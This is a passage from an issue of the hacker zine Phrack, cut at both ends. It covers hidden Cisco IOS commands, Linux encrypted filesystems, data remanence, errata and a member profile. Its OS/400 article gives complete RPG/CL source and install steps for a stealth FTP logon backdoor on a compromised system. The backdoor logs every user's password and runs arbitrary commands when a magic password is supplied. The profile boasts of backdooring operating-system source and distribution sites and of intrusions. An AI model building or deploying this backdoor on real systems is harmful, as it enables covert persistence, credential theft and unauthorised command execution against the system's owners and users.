0x57800000 0x57FFFFFF 8388608 Iomem R/W iomem2:(iomem2_cwt) 0x60000000 0x677FFFFF 125829120 Local R/W main 0x60008900 0x6123AC29 19079978 IText R/O main:text 0x6123C000 0x6136A17F 1237376 IData R/W main:data 0x6136A180 0x6152565F 1815776 IBss R/W main:bss 0x61525660 0x677FFFFF 103655840 Local R/W main:heap @sh region
picking a random location within memory shows what segment that specific address falls under. same info can be gleaned from the root command. ctalkb#sh region a 0x07800000 Address 0x07800000 is located physically in : Name : iomem2 Class : Iomem Media : R/W Start : 0x07800000 End : 0x07FFFFFF Size : 0x00800000 @sh sum this takes the compressed image and computes its checksum. this is compared with the previously stored checksum to ensure integrity. ctalkb#sh sum New checksum of 0x36D03E96 matched original checksum ctalkb# @sh timers (show timers for timer command in config mode) ctalkb#sh tim State Handle interval due invoked missed Process @test transmit (test the transmission of L2 frames) this command allows you to send the specified number of frames to the specified destination: ctalkb#test transmit interface: Ethernet3/0 total frame size [100]: 1) To this interface 2) To another interface 9) Ask for everything Choice: 2 Encapsulation Type: 1) Ethertype 2) SAP 3) SNAP 4) SNAP (Cisco OUI) 5) SNAP (EtherV2 OUI) 6) Novell 802.3 Choice: 1 Protocol type: 1) IP 2) XNS 3) IPX 9) Ask for everything Choice: 1 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (in config mode) @boot system rom if the system has an image burned in on rom, this command allows you to revert to that image instead of the image stored on some other secondary media (flash card). ctalkb(config)#boot system rom The 'boot system rom' command is not valid for this platform. It has been translated to 'boot system flash bootflash:' @boot module the command is there, but it doesn't seem to do anything besides barf. 00:34:02: %PARSER-3-BADSUBCMD: Unrecognized subcommand 11 in configure command 'boot module a' @exception-slave dump X.X.X.X informs the router where to dump the core image. @exception-slave protocol tftp tells the router what protocol to use when dumping the core image. @exception-slave corefile tells the router what to name the corefile. note that this corefile has to be at least 666 on the tftp server for the router to be able to write it. @ip slow-convergence i haven't been able to see any difference in the router performance after enabling this command. regardless, it does not look like a command which would improve the router performance. @ip tftp boot-interface tells the router what interface to find its image in the case that it wants to boot net via tftp. @loopback diag all of these loopback commands allow you to loop the hardware at specific points so that you can isolate hardware faults. e.g. this is not just a loopback net and loopback local command set. also, not all pieces of hardware can be looped at all the below points. @loopback dec (at dec chip) @loopback test @loopback micro-linear @loopback motorola @scheduler max-task-time 200 (last val in milliseconds) this knob allows you to set the number of milliseconds a specific process is on CPU before it reports debugging information. a relatively easy way to report which process is hogging. sh proc cpu is obviously the best way to track down cpu hogs while on the router, but this command allows you to track down more insidious hogs. 00:13:18: %SYS-3-CPUHOG: Task ran for 308 msec (3/1), process = Virtual Exec, PC = 603C9AD8. @scheduler heapcheck process (memory validation.. after proc) @scheduler heapcheck poll (memory valid after some poll) @scheduler run-degraded (perhaps in a failure mode?) causes the scheduler to attempt to keep running even in the face of some sort of fatal process error. the default action of IOS is to have this knob turned off and to crash the router upon the recognition of a fatal error. this is done on a per-process basis. obviously, some processes are more critical than others and moving the offending process out of the scheduler won't really buy you any time or information. @service internal this is a really nifty command. turning it on in global configuration mode allows you to view some previously hidden commands. turn it on by default and you will eventually find some extras. some commands are not even accessible unless this is turned on. (sh proc all-events fex) @service slave-coredump this allows you to dump core when applicable to some slave machine for logging purposes. this does take a long time depending on the amount of memory in the router (copying 128MB with varying link speeds. you do the math). it is important to note that this copying occurs before the router enters usable mode, so you basically have added quite a bit of delay into the reload time. the exception-slave commands inform the router where to dump the core image. @service log backtrace (provides traceback with every logging instance) -Traceback= 603C9AE0 603546C0 60354A48 6035CA58 6035C3F4 6035C34C 60373EBC 603B6D2C 603B6D18 in bgp config: @neighbor ctalkb-out filter-as 100 d % filter-as is an obsolete subcommand, use filter-list instead this is a nifty command in that it gives you a little more insight into whats happening. i would prefer this command even though it has been deprecated in favor of the filter-list command. reasoning: this command is more specific. in router isis config: @partition-avoidance not quite sure what this does since i don't have a complex isis setup to test. |0x03|------------------------------------------------------------------------| |----------------------- OS/400 Exit Point Programming -----------------------| |clever ------------------------------------------------------| Introduction Exit points enable programmers to embed custom logic in otherwise non-configurable system functions. At a certain stage of its execution, a program with an exit point will execute the programs which have been registered with its exit point, passing relevant parameters to the called programs. At that time, the exit point program can do anything it likes with the parameters passed to it and modify the behavior of the calling program by passing back values, if it decides to do so. Exit point programming is somewhat esoteric. Most people who deal with the AS/400 are not aware of the existence of exit points, and most of those who know about them do not use them. System administrators who care about security have used them since they became available to improve system security by logging things like user profile creation or limiting the use of system facilities to a subset of the users who could ordinarily make use of them. Suppose that you have gained access to a typical AS/400 system. Its administrators are concerned about security, but they lack a consistent security plan and the skill to implement it, even if they did. Even so, the misconfiguration that allows you to gain access may be noticed and fixed at any time. A new user profile would probably be spotted. You need a way to retain control over the machine that won't be noticed by most people. Exit points do most of the work for you. One exit point present in the ftp server software is "FTP Server Logon", named QIBM_QTMF_SVR_LOGON. Its parameter format is TCPL0100. TCPL0100: Application Identifier 4B Input User Identifier * Input User Identifier length 4B Input Authentication String * Input Authentication String length 4B Input Client IP Address * Input Client IP Address length 4B Input Return Code 4B Output User Profile 10A Output Password 10A Output Initial Current Library 10A Output The parameters marked 'Input' are set by and received from the system; these fields contain user signon information, which we should log. The only output parameter about which we care in this instance is 'Return Code', which we must set to 1, telling the system to proceed with authentication and that the password provided must match the actual password of the user profile for authentication to succeed. Other return code values cause the system to do various things that you might find useful. Consult the documentation if you are curious. So. 1. ftp> open x.x.x.x Connected to x.x.x.x. 220-QTCP at x.x.x. 220 Connection will close if idle more than 5 minutes. Name (x.x.x.x:root): werd 331 Enter password. Password: f.u.c.k.493 2. The exit program is called. The server passes it the parameters mentioned above. 3. The exit program does whatever it likes. It sets the 'Output' parameters, if it likes. The exit program returns. 4. The server considers the parameters passed back to it and does whatever is indicated by those parameters. Below is a stripped-down version of one tool I use for this. It isn't hidden. It should only be used on boxes whose administrators are somewhere between 'Don't Care' and 'Making A Clumsy Effort At Security'. That is to say, most of them. Names/types. F01 RPGLE F02 CLLE FP PF Creating. CRTPF FILE(x/FP) SRCFILE(x/x) TEXT(*BLANK) CRTRPGMOD MODULE(x/F01) SRCFILE(x/x) DBGVIEW(*NONE) OUTPUT(*NONE) CRTCLMOD MODULE(x/F02) SRCFILE(x/x) OUTPUT(*NONE) LOG(*NO) DBGVIEW(*NONE) CRTPGM PGM(x/F) MODULE(x/F01 x/F02) TEXT(*BLANK) ALWUPD(*NO) USRPRF(*OWNER) DLTMOD MODULE(x/F01) DLTMOD MODULE(x/F02) Put F and FP somewhere QTCP can find them. QUSRSYS, maybe. Register x/F with QIBM_QTMF_SVR_LOGON using WRKREGINF. Restart ftp. Using. The command goes in the user field. The special authorization string goes in the password field. Normal signons get logged in FP. Ignore the error; data area TEST does get created in QGPL. ftp> open x.x.x.x Connected to x.x.x.x. 220-QTCP at x.x.x. 220 Connection will close if idle more than 5 minutes. Name (x.x.x.x:root): crtdtaara qgpl/test *dec 331 Enter password. Password: itsmeclever 530 Log on attempt by user CRTDTAARA rejected. ftp: Login failed. Remote system type is . ftp> Code. (F01) FFP O A E DISK D S c 'itsmeclever' D DParms pr extpgm('F01') D AppID 9b 0 D UsrID 100a D UsrIDLen 9b 0 D AutStr 32a D AutStrLen 9b 0 D ClntIP 15a D ClntIPLen 9b 0 D Rcd 9b 0 D UsrPrf 10a D Pwd 10a D InlCurLib 10a D DParms pi D AppID 9b 0 D UsrID 100a D UsrIDLen 9b 0 D AutStr 32a D AutStrLen 9b 0 D ClntIP 15a D ClntIPLen 9b 0 D Rcd 9b 0 D UsrPrf 10a D Pwd 10a D InlCurLib 10a D DLog pr D Type 10a value D Text 200a value D DExcCmd pr D Cmd 100a value C if %subst(AutStr:1:AutStrLen) = S C callp ExcCmd(%subst(UsrID:1:UsrIDLen)) C eval *inlr = *on C return C endif C C callp Log('FTP': C %subst(UsrID:1:UsrIDLen)+ ' '+ C %subst(AutStr:1:AutStrLen)+ ' '+ C %subst(ClntIP:1:ClntIPLen)) C C eval Rcd = 1 C C eval *inlr = *on C return PLog b D pi D Type 10a value D Text 200a value C time FPTS C eval FPTYPE = Type C eval FPTEXT = Text C C write FPR P e PExcCmd b D pi D Cmd 100a value C callb 'F02' C parm Cmd P e - - - - - - - - - - (F02) PGM PARM(&COMMAND) DCL VAR(&COMMAND) TYPE(*CHAR) LEN(100) MONMSG MSGID(CPF0000) EXEC(GOTO CMDLBL(ERROR)) CHGJOB LOG(0 99 *NOLIST) LOGCLPGM(*NO) CALL PGM(QCMDEXC) PARM(&COMMAND 100) ERROR: ENDPGM - - - - - - - - - - (FP) A R FPR A FPTS 14S 0 A FPTYPE 10A A FPTEXT 200A Hope this helps someone. clever 20000222 |0x04|------------------------------------------------------------------------| |---------------------- Linux and Encrypted Filesystems ----------------------| |phunda mental --------------------------------------------| Most people don't realize it, but Linux has incredibly robust support for encrypted filesystems. This functionality is not present in the stock kernel due to U.S. export regulations, but it can be easily added by obtaining the patchset for your kernel version from www.kerneli.org. In this article, I will present a quick introduction to setting up strong encryption within the Linux kernel, and then I will present a few configurations that allow for seperatly encrypted home directories for each user, encrypted disk partitions, etc. First, you must download util-linux-2.9e.tar.gz[1], and the kernel source patches. For the purposes of this article, I'll assume you are running kernel 2.2.4; therefore you would get patch-int-2.2.4.1.gz[2]. In /usr/src do ln -s linux lin.2.2.4 (the patch expects this to be the name of the source directory) and apply the patch with zcat patch-int-2.2.4.1.gz | patch -p0. Now look in linux/Documentation/crypto. There are some patches in there to Linux utilities. Unpack the util-linux distro, apply the necessary patch, and build the new utilities. You'll need to install the new losetup and mount commands. Remember that mount needs to be suid root if you want users to have the ability to mount encrypted volumes. Now build a kernel with make menuconfig, and take a look at the dox in the Documentation/crypto directory. You'll notice that the kernel patches give support for Blowfish, DES, DFC, IDEA, MARS, RC6 and Serpent. These ciphers can be used by the networking code, or the loopback device. The loopback device also has special support for CAST128 and Twofish. Once you have your new kernel up and running, you can make a blowfish encrypted volume like so: $ dd if=/dev/zero of=vol.img bs=1024 count=2000 $ losetup -e blowfish /dev/loop0 vol.img Losetup will prompt you for a passphrase. This passphrase is hashed with RIPEMD-160 in order to key the cipher. $ mkfs.ext2 /dev/loop0 $ losetup -d /dev/loop0 #disconnect the loopback device All of the preceding commands can be issued as a user, to actually mount the volume, you will need root status, or the appropriate line in /etc/fstab. # mount vol.img /mnt -o encryption=blowfish Mount will prompt you for a passphrase, enter the one you gave to losetup, and the volume will get mounted on /mnt. In order for user joe to mount ~/.img on ~/secure a line in fstab like this is needed: /home/joe/.img /home/joe/secure ext2 noauto,user,rw,exec,encryption=blowfish Now joe can mount his volume with the command "mount ~/secure". A similar tactic can be used to have joe's entire home directory encrypted. Make a directory called /usr/imgs/joe and let the directory "joe" be owned by user joe. Place an encrypted img called home.img in /usr/imgs/joe and modify /etc/profile to check if the user's home directory image exists, and if it does, mount the encrypted image onto /home/$USER (if it is not already mounted). Then, all that is needed is an appropriate line in /etc/fstab to allow joe to mount onto /home/joe. I personally use this scheme to keep my home directory encrypted on my machines. When I log in, /etc/profile gets executed and it asks me for the passphrase needed to mount my home directory. A crontab periodically runs and tries to unmount my home directory, so that when I log out and any jobs I left running end, my home directory will get unmounted. If you use xdm to automatically launch X on boot up, then you will need to modify Xsession in the xdm directory to launch an xterm that executes the mount command so that the user can mount his home directory before his ~/.xsession gets executed. Consistent with the UNIX philosophy that a device is a file, Loopback encryption also works for block devices. To encrypt disk partitions, Linux will need a small unencrypted root partition (just enough for the kernel, /dev, /etc, /lib and the basic binaries), maybe 15 or 20 meg. /dev/hda2 will contain a filesystem that houses /usr, /var, /home and whatever else you have. It will get mounted on /fs/hda2. You can set this filesystem up like so: $ losetup -e blowfish /dev/loop0 /dev/hda2 $ mkfs.ext2 /dev/loop0 $ mount /dev/loop0 /fs/hda2 Now you can copy all of /usr and everything to /fs/hda2 and just symlink /fs/hda2/usr to /usr so that everything works. Alternatively, if you have seperate partitions for /usr, /var, and /tmp you can set them up as individual partitions. Set up your fstab as follows: /dev/hda2 /fs/hda2 ext2 defaults,encryption=blowfish 0 0 Now, when you boot, you will get prompted for the passphrase needed to mount /fs/hda2. An attacker will get virtually nothing from your machine.. they won't even know what applications you have installed. I use a similar scheme to keep the contents of removable media and PCMCIA flash cards encrypted. The kernel patches have other applications besides encrypted filesystems. The patches give support for ENskip, and a tunneling hack which allows encrypted IP through UDP called CIPE. Check out kerneli.org for more info on this stuff. Credit, and thanks go to the kernel and patch set maintainers. References: 1. ftp://ftp.aanet.ru/pub/Linux/utils/util-linux-2.9e.tar.gz 2. ftp://ftp.kerneli.org/pub/kerneli/v2.2/patch-int-2.2.4.1.gz |0x05|------------------------------------------------------------------------| |------------------------------ Data Remanence -------------------------------| |phunda mental --------------------------------------------| So, you've encrypted all your goodies with 3DES, selected strong passphrases, and now you are content to sit back and have a beer, knowing that your stuff is secure, right? Yeah. Sure it is. We are facing the problem of data remanence, and it's a bitch. Strong crypto only protects the ciphertext; if the plaintext is sitting around on your hard drive you're still screwed. Data remanence, as the name implies is the residual remains of data after it is has been deleted, cleared or purged. In this document, the term "deleted" refers to the normal OS-supplied delete command. Clearing data refers to a process that attempts to destroy data such that it cannot be reconstructed with normal OS-supplied commands or functions, including specially created software. Purging refers to a process (generally in hardware) that attempts to defeat all of the above methods of reconstruction, along with laboratory-based reconstruction techniques. Obviously, DR occurs in many forms, and can be exploited in a few different ways. Software Methods The first way that DR can bite us in the ass is one that any competent DOS/Windows user should know about: the undelete command. The standard MS delete just kills the pointer to the file in the FAT, while the data itself still sits on the disk. Undelete just restores that pointer, and we can get some (or all) of those data bits back. Well, depending on which color hat we are wearing at the moment, this may be helpful. If you are snooping on some alien machine, remember to try undelete when looking for interesting files. Else, get a program that can help you clear the data. In a pinch, defragging a hard drive can sometimes defeat something like undelete (depending on how the OS in question works). Awhile back I was sitting in IRC, discussing DR under Linux. The standard response that I got was that since ext2 (the Linux filesystem) doesn't operate like FAT, the undelete-type practice can't be done and so we have nothing to worry about. This simply isn't true. Under linux, do the following (you may need root, depending on how you configured your setup): dd if=/dev/zero of=disk.image bs=1024 count=300 mkfs.ext2 disk.image mount disk.image /mnt -o loop cd /mnt We just made a 300k looped filesystem, and mounted it on /mnt. Now CD to /mnt and create a file with some known text in it .. try: ps aux > sensitive.file sync rm sensitive.file Now, we've deleted our sensitive file, but as will be demonstrated, this file has not been cleared. Now umount /mnt and do: strings < disk.image | grep USER You'll see some text from the ps. Now, if your gear got confiscated imagine someone just running this command on /dev/hda1, or whatever. Don't think DoJ wouldn't pay people to weed through all the junk to obtain a few juicy bytes, or run some nice pattern matching software on the strings output to find stuff that looks interesting. Or, maybe you don't want the contents of a file .. maybe you want a passphrase, or the internal state of an RNG or a cipher? Dig around in the swap partition, maybe you'll get lucky. This is an example of what DoD calls a "keyboard attack" in the "green book[1]." It is an attack to exploit the remnant data on a system using a software method. We need a clearing technique here too, and a good way is to zero the actual bits of the file; ext2 will eventually support this internally[2], but for now you can just rm the file and then make a new file of all zeros that fills the entire disk. Lets try that. mount disk.image /mnt -o loop cd /mnt dd if=/dev/zero of=output bs=100k #wait for error sync rm output Now umount the disk.image and run strings on it again. You'll notice that the ps output is gone. You'll also notice that some of the the filename is still there. If the file is under some sub-directory, you can rmdir the directory and use the above method. If the file is at root-level, you're hosed: people can see your filename. Overwriting the file's bits one-for-one with zeros insures that one will not be able to read the data back with the recording device itself; thus software, or "keyboard" attacks are successfully defeated by such software measures. It is a good practice to create a script that checks /proc/meminfo under Linux. If there is enough RAM free to hold any crap floating in swap, then free the swap partition, zero it (or use other techniques, discussed below), make a new swap partition and reattach it. This could be put in a cron job that runs at off-peak hours. There are also programs like "wipe.com" (DOS)[3], and "Burn" (Mac)[4] that wipe the bits of certain files, allowing a more controlled (and thus faster) method of wiping remnant data. I don't know of a way to securely wipe files under Linux other than by filling the disk. The programs that I found that report to do so fail, and I can't think of a reliable way to do it outside of ext2.c. Hardware Methods There is a third type of attack, however, that does not depend on what the device (say, a hard disk) claims is on the media. This type of attack analyzes the media directly; we'll call it a laboratory attack. A laboratory attack is highly theoretical, but we had better talk about it anyway. The first thing we have to remember is that digital media isn't purely digital: we record our bits on an essentially analog medium, which is precisely why we need stuff like MFM (modified frequency modulation) encoding; an actual DC level would erase data, not record it. So, lets talk about disks, and cover some magnetic recording properties real quick. I'm going to be fast and loose with the electronics, I know it is terribly inaccurate; we just need the basic concepts here. In general, magnetic recording is achieved by issuing a magnetic charge onto some ferrous-type material with an electromagnet. To read the data back, the juice to the electromagnet is shut off, and the disk spins by the coil of the magnet, which induces a voltage in the electromagnet, effectively making a small generator. Now, for the sake of accuracy we don't just spit bits out into the magnetic medium, because DC levels don't work with transformers; which is what our read/write head is, basically. So we need to encode it in an analog signal using some modulation technique. For the sake of argument, lets say our disk is using something like frequency shift keying (FSK). In reality, our drives don't do this, but our modems do. I'll use FSK since it is easier to talk about, and easy for newbies to understand. The way we encode our data is to take every digital one and play an analog tone for some time, T, and some other tone for a digital zero, also for some time T. Maybe we encode 0 as 2600 Hz and 1 as 2000 Hz (the Kansas City standard for storing digital info on cassette tape is 0 = 2400 Hz and 1 = 1200 Hz). The reason I'm reducing this to a simplified audio analogy will soon be obvious. If you record over a commercial cassette tape with a shitty tape recorder, where there are periods of silence in your recording you may hear the original commercial tune. This remnant signal is there all the time, not just during silence. What has happened is that the magnetic flux delivered by the read/write head of your tape recorder was not powerful enough to completely change the polarization of the magnetic particles on the tape for the time that the particles were exposed. Those particles act in a predictable way, and if we know their current state, and the signal applied to them the last time, we can recover the previous state. Chock this one up to magnetic hysteresis, it could also be due to the head of the tape recorder not being aligned perfectly. More on this option below. If a particle on a disk has a current polarization strength of A, and we know what sort of flux was applied to the particle (which we can find by examining the read/write head) then we can find the the state of the particle prior to the last write to it, which allows us to reconstruct the data. Real world bit recover would simply require looking at these particles and taking into account the encoding scheme used. The SFS (Secure File System) documentation gives a good description of many different encoding schemes. As I said, this is a theoretical attack. I am not aware of it ever actually having been used to recover data. How can we defeat this attack? By overwriting the data many times. If we overwrite our data many times, the stored charge on the particle gets constantly closer to the upper-end ideal value, which disguises the data "underneath." We can use several applications of random bits, and then several applications of 00h's and FFh's to overwrite the data. The random bits insure that the attacker doesn't find a pattern. The multiple applications of FF expose the particles to the magnetic flux for a longer period of time. Each application gets those particles closer and closer to the ideal representation of FF. The truly paranoid will want to do all of this several times. Some recommend writing zeros after the ones. This is probably pure paranoia, and it might be a good idea. As alluded to above, there is another type of data remanence that can be attacked in the lab due to variance in the position of the read/write head. As the disk spins, the head will float over different portions of the disk each revolution. When a write occurs, it may charge certain particles and on an overwrite it may miss some of those particles, leaving the original information behind for exploitation by the lab. This lets an attacker read further back into the data record than by weeding out signals by cancellation, and is probably easier to perform in some respects. We have no control over this whatsoever in software. To protect against this attack requires either degaussing of the media, or encryption of the entire device from the first moment it is used until the last. Using encryption stamps out all of the above problems in one clean, elegant stroke. Imagine a device that sits in-line between your IDE (or SCSI) adapter and the disk controller of the drive. All attempts by the PC to negotiate with the drive are intercepted by this device, and the data is either encrypted or decrypted as needed and sent along. Thus everything that ever touches the drive: file system formatting, the OS ... everything gets encrypted and stored. The entire operation would be transparent to the host computer, and independent of its processing. The user merely gives a key to this controller at start up: maybe there is a keypad embedded into a 5.25" faceplate that is mounted on the computer's case. Such a hardware solution not only takes care of data remanence issues but also helps to secure the computer as a whole: with the partition table, and OS encrypted, the machine cannot boot without the user having set up the in-line filter with the correct key. Can a well funded adversary pull off a laboratory attack like those discussed here? Probably. So if you're not using some form of encryption, you might want to start thinking about it. For the stuff that no one but you can know about, keep the plaintext on floppies and the ciphertext on your hard drive. Floppies can be destroyed or degaussed easily. Remember to watch your swap partition though; it is probably wise to disengage swap when manipulating sensitive material. Best of all, RAM is cheap. Buy 256M of it and give up swap space completely. Against a sufficiently powerful attacker who has your hard drive, you are in a world of hurt without in-line encryption. Just how powerful "sufficiently powerful" needs to be to actually make this stuff work is open to speculation. Notes: 1. NCSC-TG-025 "A Guide to Understanding Data Remanence in Automated Information Systems" http://www.geekstreet.com/green.html 2. This was all tested with linux kernel version 2.0.35. I do not know if 2.1.* will ever have a newer ext2 or not. Look into the chattr command on your machine, and dig into the kernel source to see if the ext2 code does anything or not. On 2.0.*, it does nothing. 3. From the No-where utilities, get it from your favorite HP filez site. 4. Burn is available from the Info-Mac archives. |0x06|------------------ Phrack 55 Addendum and Errata -----------------------| |-----------------------------------------------------------------------------| P55-14@71: I would like to make the following correction in my article "A GPS Primer" from Phrack 55. The Teledesic project is _not_ a MEO satellite venture, but rather, it uses Low Earth Orbit (LEO) satellites. Thanks to Eric Rachner for pointing this out. [ Thankz to e5 for submitting this correction. ] P55-18: File 18 was erroneously listed as file 17. |EOF|-------------------------------------------------------------------------| - P H R A C K M A G A Z I N E - Volume 0xa Issue 0x38 05.01.2000 0x04[0x10] |------------------------------ P R O P H I L E ------------------------------| |-----------------------------------------------------------------------------| |----------------------------------- sw_r ------------------------------------| The Phrack Prophile iz intended to be a short biography on the indiviual in question. It'z Phrackz way to recognize that this person has done something worthy of mention in some capacity. More or less a soap-box, The Prophile givez the person a chance to spout off about whutever they want and aggrandize themselvez to their heart'z content. This iz *their* time to shine. |------------------------------ P E R S O N A L ------------------------------| |-Handle -------------| Shockwave Rider |-Previouz handlez ---| The Phelon, cpmhaqr, guest_, master blaster, s1thl0rd, others |-Handle origin ------| 1975 book by John Brunner |-Call him -----------| Varies depending on who you are |-Reach him ----------| Don't call me, I'll call you .. (email: swr@gti.net) |-Date of birth ------| 5/16/80 |-Height -------------| 5'10" |-Weight -------------| 170 |-Eye Color ----------| Brown |-Hair Color ---------| Black |-Cool crap owned ----| one line isn't gonna do this justice.. ;) |-Sitez I run --------| various private systems |-URLz ---------------| the web is gay. but check these urls out anyway: http://www.suzie.org http://www.velkro.net/swr |----------------------------- F A V O R I T E Z -----------------------------| |-Women --------------| Brunettes with class, wit, and intelligence. hi suzie!@ |-Carz ---------------| As of this writing, I don't really drive.. once I settle into my new location, I plan to purchase a new vehicle. (I've always been into cars and performance vehicles, so it'll be something FAST!@). I have tons of 'favorite' cars, but among the favorite of the favorites at the moment are the Porsche 911, Dodge Viper, Porsche 959 (the only reason it doesn't win hands down is 'cuz it's still not street-legal, which sucks) & Acura's NSX-T. |-Foodz --------------| All kinds - I'm Indian, so naturally Indian's my favorite.. but I also love Italian, Thai, Chinese, etc. My favorite foods overall are probably steak and pizza. If made right, I could live on both forever without tiring of either - though I'd probably want Indian food occasionally (of course). |-Alcohol ------------| Wayyy too much to list here. I like good beer, strong whiskey.. and pretty much anything else as long as it's wet & alcoholic(!@). |-Music --------------| Major hip-hop fan. I'm also into hard rock/heavy metal, classical.. pretty much everything, except for the perennial exception that is Country. Favorite bands/groups off the top of my head include - NWA, Tribe Called Quest, Eazy-E, Beastie Boys, Nirvana, Tool, Eric B+Rahkim, Slick Rick, Metallica, Korn, Beck, Ice Cube, KRS-ONE, Public Enemy, Front 242, Guns N Roses, Schooly D, Cypress Hill, Led Zeppelin, Wu-Tang Clan, MC Eiht, MC Ren, Garbage (Shirley Manson r000lz), NIN, Toadies, Aerosmith, Sir Mixalot, Me First & The Gimme Gimmes, DR Octagon, DJ Rectangle, Eminem, Weird Al, Motley Crue, Mr. Bungle, Red Hot Chili Peppers, Gang Starr, Run-DMC.. |-Moviez -------------| HEAT, Goodfellas - pretty much anything with DeNiro or Pacino in it, GodFather I, Pulp Fiction, Strange Brew, Bill & Teds * (classics), South Park, El Mariachi |-Authorz ------------| quick list - Fyodor Dostoevsky (Crime & Punishment, Brothers Karamozov) Dave Barry (Everything) Joseph Heller (Catch-22) WR Stevens (TCP/IP Illus 1-2, others) J.D. Salinger (Catcher In the Rye) George Orwell (1984, Animal Farm) John Brunner (Shockwave Rider) J.R.R. Tolkien (I loved the Lord of the Rings Trilogy when I was a kid, and "The Hobbit" also), Ray Bradbury (Something Wicked This Way Comes) Robert Silverberg (the Pontifex Valentine and Gilgamesh books.. part of my fantasy fiction phase, around the same time as Tolkien) Victor Harris (The Book of Five Rings), Nicholas Pileggi (WiseGuy), Sun Tzu (The Art of War), Chris Drake & Kimberley Brown (PANIC!, the most readable tech book I've ever read - which is still incredibly useful) Neal Stephenson (Snowcrash) William Gibson (Everything) |-Turn ons ------| Tits (all shapes, sizes, colors & flavors), legs,(long and smooth), platform sandals, belly button piercings, long dark hair, two chicks doing it with each other, summer dresses, and of course intelligence + sense of humor.. (those are all in reference to women) |-Turn offs ----| Anal retentiveness, pedantry, miserliness, posing/pretentiousness, stupidity (those apply to both sexes). |-Passions -----| pea! (no, not peaboy.. schmucks) Phones. UNIX & VMS internals. Learning new programming languages and operating systems. Fast cars, clever & beautiful women, good music, Guinness, good food, winter, spring, summer, fall, nights, sunsets, sunrises, good books, sleeping, ms. pacman coffee tables, cycling, coca-cola, mountain dew, water slides, learning, booze, sex/drugs/rocknroll, ice cream, weaponry, playing football, friends, video games.. anything as long as it's fun |----------------- M E M O R A B L E E X P E R I E N C E Z -----------------| Buying my first modem, and installing it. Installing QModem & calling my first BBS. Being introduced to the concept of hacking/phreaking by a local sysop (who I am still the best of friends with today). He told me I should download Phrack ('get phrack.. that zine rocks d00d, it has the best philes!'). So I dl'd the latest issue at the time, which was Phrack 46. PBXes (System75s, SL-1s, Rolms, DataStar & all the rest..) Setting up my first Alliance teleconference (0-700-456-1000) CBI Writing my first t-file Figuring out how to spawn DCL shells from captive and guest accounts. On a dialup UNIX machine, in a distant galaxy, a long, LONG time ago.. the first '#' prompt I ever saw. First NUI (it was on sprintnet) First sniffer log (sunsniffer r0ckz) First time on a DMS-100 First unpublished exploit (thanks to Scott Chasin for his generous - albeit involuntary - donation :)) Being invited to join the Phone Losers of America by el_jefe. (Anyone other than myself, dhate, and el_jefe who claims PLA is a poser. Especially RBCP and his band of gay doodleboys.) Meeting tr0ut (by hacking a system he was using) & joining H4G1S in its infancy. First root shell on a 5ESS. Yahoo! Two words.. Jay Dyson. The first (root-yielding) hole I found in UNIX. The first exploit I ever stole. The first exploit I ever wrote. Mastering digital wiretapping. Being woken up by FBI agents. Monitoring a certain computer security expert from California who appeared in Wired Magazine along with Mark Lottor as "V.T." in an article written by John Markoff about cellular phreaking. (Restore your honor.. come and get me, big guy. And get busted for eavesdropping on phonesex!@) When dk, prym, and I forwarded a certain Phrack editor's phone line to a bridge, and took all his calls for a weekend. (Sorry about that, route.. water under the bridge ;)) [ EdNote: it wasn't for a weekend fuck0! It was for a day (I disconnected the number that afternoon -- and I still remember it because it was so elite: 2801600). ] IRC'ing as erikb. Mocking "security expert" Scott Yelich while breaking into his 'secure' machine, security.spy.org. (He ended up pulling his cables.. lame). Owning everyone and everything. c4p3b0y vs. andy 0f m4yb3rry autoreplyd groktelnet Backdooring the source code of several popular commercial & free operating systems, and binary distributions of popular packages at their distro sites. (I'll bet that gives you a warm, fuzzy feeling just thinking about it.) Cheating on every online game in existence for laughs (a lot of them with DK) kibitz on beelzebub (y0y0 neal!) Writing BoW 9 with U4EA, Lister, and DK All the funny prank calls, especially with el_jefe, dhate, U4EA & DK. My first con (pumpcon).. the kind of experience that's memorable because nobody lets you forget it ;) whackpack.hilarious.log gay.log our short-lived young apprentice (dead_rat of the LoD!@##$) elastic's 'creatively edited' logs sloppy's ass mailing list & everything associated with it - 50mb of email a day, getting threatened with lawsuits by Captain Zap (world-class retard, belongs in the meinel-vranesevich-shipley-brianmartin trashcan), Agent Steal's 400k ego rants, elastic's incoherent & hilarious ravings, etc etc. SEAWORLD ADVENTURE SARLO Oh yeah, and boards to mention: The Forbidden City Ripco The Toll Center Demon Roach Underground The Station Error 23 Realms of Valor |-------------------------------- Q U O T E Z --------------------------------| GO AWAY PLA! It's not paranoia if they're really after you. leggo my eggo pea *SPINS* "KTHNX!" -pea ??? P4NTZ/H4G1S - GL0B4L D0M1N4Ti0N '97 P4NTZ/H4G1S - GL0B4L D0M1N4Ti0N '97 - PR1S0N '98 If you're not owned by H4G1S, you're not worth owning. If you're not worth owning, you're probably owned by H4G1S anyway. '$show users /full/int/givemesysprivs' "yeah, but, uh, how are we supposed to chmod chmod?" "dog" - tr0ut Welcome to OpenBSD: The proactively secure Unix-like operating system. "The dragons breath was warm and damp, it fogged up the mirror, I wiped the mirror with a tissue, the tissue tore, the dragon swallowed the damp tissue whole." (probably not exact) - tr0ut "f dragons" - tr0ut y0y0y0, sl0ppy 0n the m1c watch my h1p tr1x 0n da bmx b1ke I'm whirlin' and twirlin' like a bat 0utta hell d00d, that stench, it's me, I smell! 0n the payph0nez iz where I l1ke t0 be call1ng ppl I d0nt even kn0w in TURKEY! HEHEHE! I have a psychopathic streak! messaging st4r ab0ut drag0nz iz when I'm at my peak! g00d g0d r0d, that tissue is damp! watch th1s 360 of the handicap r4mp! 0ff I g0, b1king int0 the sun tissuez and payph0nez, my life iz s0 fun! - tr0ut freestyling on the topic of the official H4G1S BMXer "what's a golden shower?" <2 minutes later> "this is waq.. you can see people peeing!" - sloppy "hmm, huh, hrmm, duh, drhfhfhfmasfh rhummm shoelaces?" "Don't question my technical abilities!" - Agent Steal "I hate JP more than I hate banana candy" - dk "We're so money and we don't even know it" - dk "i've had a lot of practice swordfighting underwater" "-shep-" -u4ea "Do they live in each others basements?" - eubern1g "Waaleikum Pastrami!" - eubern1g "Summa Sedes Non Capit Duos" I would like to include a lot of other things the people listed below have said that aren't included here - most of them are often pretty witty & funny. A lot of stupid things that people have said crossed my mind as well, but I decided I didn't want their words showing up in my Quotes.. :) But, since I wrote this up from memory, and also due to space limitations, this is not possible.. Oh well. |--------- T H E F U T U R E O F T H E U N D E R G R O U N 